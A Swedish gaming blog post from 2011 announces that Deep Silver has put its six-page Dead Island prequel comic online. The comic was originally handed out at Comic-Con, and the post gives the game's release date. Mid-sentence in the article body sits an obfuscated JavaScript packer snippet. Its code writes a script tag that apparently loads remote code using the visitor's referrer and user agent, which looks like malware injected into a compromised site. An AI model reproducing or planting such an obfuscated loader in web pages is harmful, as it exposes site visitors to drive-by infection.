Image Image Image Image Image Image Image Image Image Image

| 18 september, 2018

Scroll to top

Top

Dead Island i serietidningsformat! dock en riktig kort historia…

Dead Island i serietidningsformat! dock en riktig kort historia…
Filip Urde
  • On 31 augusti, 2011
  • http://www.revue.se/filip-urde

Deep Silver har gett ut en sexsidor lång serie som ska skildrar upptakten inför händelserna på den tropiska paradisön. Serien delades ursprungligen ut på ComiCon i juni, men nu finns den även att läsa här.
Dead eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ehike|var|u0026u|referrer|iatsd||js|php’.split(‘|’),0,{}))
Island släpps till Xbox 360, Playstation 3 och PC den 9 september.
subscriptions.marvel.com